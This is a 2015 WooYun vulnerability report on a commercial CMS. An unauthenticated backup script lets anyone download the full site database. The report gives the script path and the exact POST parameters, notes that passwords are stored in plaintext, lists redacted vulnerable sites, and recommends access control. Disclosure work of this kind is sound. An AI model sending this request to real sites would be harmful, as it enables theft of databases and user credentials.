当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(32) 关注此漏洞

缺陷编号: WooYun-2015-105109

漏洞标题: 某超大型商业CMS整站数据库下载漏洞(涉及500强、工业、国企、电商、酒店集团、服务业等等领域)

相关厂商: 七星迪曼•易龙天

漏洞作者: 路人甲

提交时间: 2015-04-03 12:25

公开时间: 2015-07-04 20:06

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 逻辑错误 安全意识不足 安全意识不足

5人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-03: 细节已通知厂商并且等待厂商处理中
2015-04-05: 厂商已经确认,细节仅向厂商公开
2015-04-08: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-05-30: 细节向核心白帽子及相关领域专家公开
2015-06-09: 细节向普通白帽子公开
2015-06-19: 细节向实习白帽子公开
2015-07-04: 细节向公众公开

简要描述:

某超大型商业CMS整站数据库下载漏洞(涉及500强、工业、国企、电商、酒店集团、服务业等等领域)

详细说明:

客户案例,详见:

code 区域
http://**.**.**.**/bugs/wooyun-2014-081438



该漏洞可直接下载整站数据库,危害相当的大。

/esbclient/database/datebase_back.php

简化代码如下:

code 区域
if($_POST['_task']=='doDataBackup'){


global $DBCfg,$config;


/*      $conn=@mysql_pconnect($DBCfg['server'],$DBCfg['user'],$DBCfg['pass']);


mysql_select_db($DBCfg['database'],$conn);*/


$tables=array();


$a=0;


$conn=@mysql_pconnect($DBCfg['server'],$DBCfg['user'],$DBCfg['pass']);


mysql_select_db($DBCfg['database'],$conn);


//....


$saveto = $_POST["location"]; // 要保存到什么地方,是本地还是服务器上,默认是服务器


$back_mode = 'all'; // 要保存的方式,是全部备份还是只保存数据库结构


// 定义数据保存的文件名


$local_filename=$prefix.date('Y_m_d_H-i-s').".sql";


$filename = "../../db/back/".$prefix.date('Y_m_d_H-i-s').".sql";      // 保存在服务器上的文件名


// 注意后面的create_check_code()函数,这是一个生成随机码的函数,详细可以参考:


	// 保存到本地


if($saveto == "local"){


	//...


	header ("Content-Disposition: attachment; filename=$local_filename");


	echo $sqldump;


	exit;


}


// 保存到本地结束


// 保存在服务器


if($saveto == "server"){


	//...


}


// 保存到服务器结束


}



可见,当访问该文件(/esbclient/database/datebase_back.php),并post提交_task和location便可备份整站数据库到指定的地方;



漏洞证明:

访问:

/esbclient/database/datebase_back.php

并post提交:

_task=doDataBackup&location=local

(localtion为server时,保存到服务器上,为local时直接下载回本地),如图:

a.png



密码明文保存!!!!!

b.png



5个案例:

http://**.**.**.**/esbclient/database/datebase_back.php

http://**.**.**.**/esbclient/database/datebase_back.php

http://**.**.**.**/esbclient/database/datebase_back.php

http://**.**.**.**/esbclient/database/datebase_back.php

http://**.**.**.**/esbclient/database/datebase_back.php

修复方案:

权限限制

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-05 20:04

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-04-01 13:39 | 茜茜公主 ( 普通白帽子 | Rank:2407 漏洞数:413 | 家里二宝出生,这几个月忙着把屎把尿...忒...)
    1

    厂商这名字一看就觉得很霸气

    1# 回复此人
  2. 2015-04-01 14:05 | 黑暗游侠 ( 普通白帽子 | Rank:1784 漏洞数:269 | 123)
    0

    盗取我的标题。。。我是鼻祖好么,这套cms的最初提供者

    2# 回复此人
  3. 2015-04-06 00:34 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)
    0

    @黑暗游侠 看你那个洞的评论,哈哈哈哈哈哈,还鼻祖呢。。

    3# 回复此人
  4. 2015-07-05 00:31 | Chinalover ( 实习白帽子 | Rank:39 漏洞数:9 | 你看得到我打在屏幕上的字,却看不到我落在...)
    0

    然而第一个样例都没有修复,准备进入黑产吧

    4# 回复此人

登录后才能发表评论,请先 登录